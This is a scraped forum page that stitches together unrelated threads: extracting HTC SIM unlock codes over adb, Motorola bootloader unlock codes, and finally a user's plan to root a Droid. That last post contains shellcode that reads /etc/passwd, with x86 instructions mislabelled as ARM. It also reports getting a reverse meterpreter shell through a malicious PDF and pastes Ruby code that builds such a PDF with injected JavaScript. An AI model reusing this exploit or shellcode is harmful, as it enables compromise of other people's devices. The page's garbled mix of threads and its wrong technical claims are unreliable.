Hi I was wondering if anyone unlocked their phone using the code that's stored on the phone. I'm sure it will work but I don't have a sim from another carrier to try it right now.
To get your own phones code do this.
adb shell
strings -n 8 /dev/block/mmcblk0p6
It should output a bunch of stuff but one of the lines will be UN_lock_code=12345678
After that put in an unsupported sim and it should ask for a code. Put in the one from the adb shell output.
Ok I have tried this.
1) You need root
2) It can be done from Terminal Emulator
In Terminal, type:
su
strings -n 8 /dev/block/mmcblk0p6
I successfully got to the output code but got a 9-digit code (0333*****).
I put in a different sim card and was prompted for a code, but it needs an 8-digit number. I tried it without the first zero but that did not work.....
Anyone used it to get a number that works?
Not me, Im unlocked already always have been, Vodafone have never simlocked any phone ive had from them, Which is strange because other users have
I get 9 digits too.
I ran this to see what it returned. The code was not even close to the actual unlock code I used to unlock my phone.
There are several sellers on [UK] ebay offering unlock codes for only £1.19
At the moment most say they only work for IMEI numbers beginning 3599010417xxxxx
Might be worth a punt if my IMEI is added to the list
mycomputerisjunk said:
I ran this to see what it returned. The code was not even close to the actual unlock code I used to unlock my phone.
Click to expand...
Click to collapse
Is there any way that you can get from the code returned to your actual unlock code?
Could it be as simple as dividing the returned code by 3 for example...?
ascot17 said:
Is there any way that you can get from the code returned to your actual unlock code?
Could it be as simple as dividing the returned code by 3 for example...?
Click to expand...
Click to collapse
I compaired the two and nothing obvious is sticking out.
mycomputerisjunk said:
I compaired the two and nothing obvious is sticking out.
Click to expand...
Click to collapse
Oh well.... just a thought....!!
ascot17 said:
Oh well.... just a thought....!!
Click to expand...
Click to collapse
See below post.
Please dont use this method to input code into phone just yet as we are still ironing out the formula as it is working for some and not others.
mycomputerisjunk said:
I compaired the two and nothing obvious is sticking out.
Click to expand...
Click to collapse
I think i have just worked out how to get the correct code from the number supplied by above method.
Can you please confirm by checking the output code using method above and actual code you used.
Code is :
number obtained using above method - (last 3 digits of imei x 10+digits 8-12 of imei added to the end to make a number 7 digits long)
Hope that makes sense.
eg
imei = 359901041286633
number obtained using above method = 150574005
150574005 -63301286 = 87272719 (Unlock code)
This gives a number 9 digits long though....
We need an 8-digit number for the unlock code!
ascot17 said:
This gives a number 9 digits long though....
We need an 8-digit number for the unlock code!
Click to expand...
Click to collapse
After you use above method you are still left with nine digits?
jh787 said:
eg
imei = 121986789512345
number obtained using above method = 786987654
786987654 -3450512 = Unlock code
Click to expand...
Click to collapse
786987654 -3450512 = 783 537 142 = 9 digits !
There MUST be a way of getting to the real unlock code from the IMEI and the UN_Lock code in the OP. The UN_lock code works on the Sensation without any altering!
You may well be close with your theory, but if it is giving us a 9-digit number it cannot be right ...
ascot17 said:
786987654 -3450512 = 783 537 142 = 9 digits !
There MUST be a way of getting to the real unlock code from the IMEI and the UN_Lock code in the OP. The UN_lock code works on the Sensation without any altering!
You may well be close with your theory, but if it is giving us a 9-digit number it cannot be right ...
Click to expand...
Click to collapse
That is just an example. You need to substitute the numbers with your own imei and the nine digit code needs to be the one obtained from your phone using the method in post1of this thread.
jh787 said:
That is just an example. You need to substitute the numbers with your own imei and the nine digit code needs to be the one obtained from your phone using the method in post1of this thread.
Click to expand...
Click to collapse
Ah, ok! (Your example might have been better with different numbers)
When I try with my actual numbers this I do get an 8-digit number!
Unfortunately I am away from home at the moment and do not have my micro-sim from another provider to hand, so I am unable to check if it works.
Its very close.... the output I have is 1 digit out!
frazzeld said:
Its very close.... the output I have is 1 digit out!
Click to expand...
Click to collapse
which digit?
frazzeld said:
Its very close.... the output I have is 1 digit out!
Click to expand...
Click to collapse
Might need tweaking.
When you say 1 digit out is it 1 digit higher/lower or as i suspect is is the x10 bit that i got wrong?
Maybe it is just a "0" in my case and something else for your carrier.
Related
Does anyone know if it is easy to unlock a network locked One S. Of course everyone is advertising imei unlock codes but I'm not sure if they would be available straight away. Has anyone successfully done this yet? It makes a huge difference to me whether or not I get myself a contract phone (cheaper) or by a SIM free one
Yes, I am after the answer as well, hope to hear from anyone soon.
thx!
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
unfortunately it didnt work for me
Code:
C:\Program Files\Android\android-sdk\platform-tools>adb shell
[email protected]:/ $ su
su
[email protected]:/ # strings -n 8 /dev/block/mmcblk0p6
strings -n 8 /dev/block/mmcblk0p6
sh: strings: not found
azzledazzle said:
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
Click to expand...
Click to collapse
azzledazzle said:
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
Click to expand...
Click to collapse
Sure it's slow, there are only 10 people who have it atm I will be 11th today hopefully.
Seriously, I wouldn't be too much worried, it's just first few weeks of its life. Which is exciting, I remember when I got my SGS in 2010. It feels great to be part of the development almost from day 1.
Sent from my GT-I9000 using xda premium
azzledazzle said:
theres this guide, But its for the Sensation - its a similar device in terms of spec.
the values maybe different, but if someone understands what they mean (not me) they might be able to adjust it for the One S.
http://forum.xda-developers.com/showthread.php?t=1232107
Cant wait til development starts properly for this phone, Its really slow at the mo
Click to expand...
Click to collapse
Very surprised to see this method in sensation. Cos to my understanding the SIM unlock is at network level rather than something you can alter on the phone. So I was wrong.
Hope the same method can be ported to one s in the future.
By the way, I know there are lots of website charges 10 or 20 pounds to SIM unlock devices, they send you an email with unlock code back short after payment is received. Just wondering if anyone had tried any website which does this for one s? Don't mind pay a small money just to avoid rooting.
Sent from my HTC Incredible S using XDA
Just wait, There will be a proper SIM Unlock tool soon
I hate it when phones come sim locked it drives me mad, Ive never had a sim locked phone from vodafone,,,, Although every one ive had has been branded I hate that too
if u can get a code cheap enough do it, But i wouldnt pay anything more than £10 for an unlock code.. There will be a tool for free posted on here soon
azzledazzle said:
Just wait, There will be a proper SIM Unlock tool soon
I hate it when phones come sim locked it drives me mad, Ive never had a sim locked phone from vodafone,,,, Although every one ive had has been branded I hate that too
if u can get a code cheap enough do it, But i wouldnt pay anything more than £10 for an unlock code.. There will be a tool for free posted on here soon
Click to expand...
Click to collapse
That's the spirit.
Sent from my GT-I9000 using xda premium
Disclaimer: Not tested as I have not rooted yet.
Try cat /proc/emmc
That should give a list of partitions. It may be that it's simply in a different slot.
You can compare it to the list at http://forum.xda-developers.com/showthread.php?t=1168521
Maybe that'll be enough clues to find out where it is. Then simply run
strings -n 8 /dev/block/mmcblk0pX
after replacing X with your best guess
Hey guys,
About to buy a SIM locked One S today, anyone made any progress on a way to remove the SIM lock?
Cheers,
M
I'm pretty sure the method from Sensation requires S-OFF.
Sent from my HTC One S using xda premium
I've unlocked my HTC One S a few days after release from t-mobile. I just called them up and asked them for an unlock code. Took HTC about 3 days to finally give me one but all in all took me less than a week since release date to get it unlocked. Hope that helps people? Took me another 2 days to find someone with a non-tmobile sim to actually unlock the phone but all is done now.
Hi mate, i got mine unlocked off ebay for about £3..unlocked within 5 minutes
I called T Mobile yesterday and gave them the imei for my One S. I got an email this morning from them with the unlock code. I popped in my ATT SIM and entered the code and poof it was unlocked. It works on ATT HSPA by the way, if you were wondering
Sent from my HTC One S using xda premium
rahularora1 said:
Hi mate, i got mine unlocked off ebay for about £3..unlocked within 5 minutes
Click to expand...
Click to collapse
Link please? I can only see ones for about £15.....
ascot17 said:
Link please? I can only see ones for about £15.....
Click to expand...
Click to collapse
I did mine on ebay too (was a bit unsure but it was £15 for Three to do it) the item was #261012095238. It says on there the phone must be on server for a month but mine was only 3 days old and they sent me the code straight away (and it worked!)
Hope that helps
pauled29 said:
I did mine on ebay too (was a bit unsure but it was £15 for Three to do it) the item was #261012095238. It says on there the phone must be on server for a month but mine was only 3 days old and they sent me the code straight away (and it worked!)
Hope that helps
Click to expand...
Click to collapse
Thanks - I had only searched under "One S" which is why I had not found that one!
Could anyone who has used an unlock code to successfully unlock their phone take a look at this thread and see if you can help?
We are close to getting a free sim unlock hack for all but need a few contributors for testing purposes.
Thanks!
I bought the phone from Amazon.co.uk.
Do you do that on the website, motorola.com/unlockbootloader?
It seems that when you copy paste the string from the shell into the website form it will create an empty space. The website does not accept that.
Cheers,
Nicole
poipoi01 said:
I bought the phone from Amazon.co.uk.
Click to expand...
Click to collapse
When you copy the unlock data code into the Motorola website go through it and delete all spaces at the end the beginning and anywhere else in between,even if you can't see a space at the beggining of the code move the cursor to before the first number or letter and press delete anyway.
Code
I had problems getting my unlock code also, there is gaps in the code that need to be removed,
it says not eligible took me about 5+ trys but got it in the end.
aradalien said:
I had problems getting my unlock code also, there is gaps in the code that need to be removed,
it says not eligible took me about 5+ trys but got it in the end.
Click to expand...
Click to collapse
Exactly what I said, delete all spaces
Quad check everything, its actually quite hard lol
Took me like 5 tries
Sent from my XT1032 using xda app-developers app
I know that this may seem like a stupid question, but then again I never claimed to be smart but have a couple of the people who purchased unlock codes actually gotten together and taken each imei and the unlock code, then ran a script or application to generate different algorithms and functions until the same key was able to creates the unlock code properly based on the imei of the phone?
To be quite honest, it really can not be that difficult, my guess would be some sort of offset chr count of the imei and using an XOR on it or polymorphic additive encoding.
Anyway, I did just get a droid ultra, should have it tomorrow, and I will be writing a shellcode exploit for it, so I just need to wrap that into an apk, and then when it runs have it escalate into system priv's and see if I can then gain root access from that. As far as developing a way to unlock the bootloader I will need to do more research how they are setup and what they process and how before I can really say anything.
What I currently have done which would work on any ARM processor running some sort of x86 *nix
#include <stdio.h>
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
int main(){
(*(void (*)()) shellcode)();
return 0;
}
/*
shellcode[]= "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64"
"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/
Wrong section as questions go in q&a. It's been discussed and it would take several lifetimes.
Sent from my XT1080 using XDA Free mobile app
Several lifetimes according to whom? They used to say the same thing about cracking WPA2 handshakes but with CUDA and a couple of very nice graphics cards it is cut down to just a few minutes. I just thought I would put it out there..
I think I may have found a way to root the latest version but you need to install script manager and run a sh file on your phone, so I have noticed that a lot of users, if you do not just have an exe you can open and click and done they have a lot of problems so I am not sure how well it woudl fare if you had to install a script manager, install a script, then run the script.
So I may actually be getting somewhere. I have found an exploit that is brand new, so no new version have come out to patch it, all you would need to do is visit a website OR download and open a pdf on your droid and it would allow the execution of arbitrary code (yes for the ARM architecture).
Now I was able to successfully get the droid to connect back to my computer with a reverse tcp metrepreter connection. I had tried that first to see if I could use any of the post modules to gain an escalated privilege.
As many of you know this is the tougher part since the newer version of android use a type of sandbox with their applications so each application that is opened has its own memory and processor dedicated to it.
I am not giving up though, now that I found a way to dorce the droid to execute code that it shouldn's that is the main weakness, not we just need the next step which could be making another user with root priv's to ssh into the phone with, to change the r/w permissions on certain folders, I mean this is only step one of many but progress is being made, and I don't think for my first droid app I am not doing so bad.
I am open to ideas if you guys/gals have any, this is what I did to get the connection. It is an exploit in the pdf reader that you can base64 encode and then zlib compress javascript exploits into the pdf, then as the pdf opens it compresses the script and executes it.
Code:
def add_compressed(n, data) add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data)))
end
def pdf(js)
self.eol = "\x0d"
@xref = {}
@pdf = header('1.6')
add_compressed(25, "eJzjtbHRd0wuynfLL8pVMDFQMFAI0vdNLUlMSSxJVDAGc/0Sc1OLFYyNwBz/0pKczDwg3xzMDUhMB7INzcCc4ILMlNQiz7y0fAUjiOrgkqLS5JKQotTUoPz8EgVDiPkhlQWp+s5AC3Ly0+3seAG6CSa9")
add_compressed(40, "eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw")
add_compressed(3, "eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r")
add_compressed(32, "eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo")
add_compressed(7, "eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a")
add_compressed(16, "eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==")
add_compressed(22, "eJzjtbHRD1Mw1DMytbPjBQARcgJ6")
add_compressed(10, "eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=")
add_compressed(11, "eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR")
add_compressed(12, "eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD")
add_compressed(13, "eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=")
add_compressed(14, "eJzjjTY0VTBQCFKAULG8ABzfA0M=")
add_compressed(15, "eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==")
add_compressed(26, "eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==")
add_compressed(41, "eJzjjTa2UDBQCIrlBQAKzAIA")
add_compressed(54, "eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=")
add_compressed(34, "eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK")
add_compressed(35, "eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==")
add_compressed(33, "eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==")
add_compressed(29, "eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=")
add_compressed(36, "eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==")
add_compressed(30, "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")
add_compressed(38, "eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=")
add_compressed(43, "eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==")
add_compressed(51, "eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=")
js = Zlib::Deflate.deflate(js)
add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d")
add_compressed(8, "eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==")
add_compressed(9, "eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==")
add_compressed(17, "eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=")
add_compressed(18, "eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=")
add_compressed(19, "eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==")
add_compressed(20, "eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=")
add_compressed(21, "eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==")
add_compressed(39, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=")
add_compressed(47, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==")
add_compressed(48, "eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=")
add_compressed(45, "eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ")
add_compressed(23, "eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=")
@xref_offset = @pdf.length
@pdf << xref_table << trailer(25) << startxref
@pdf
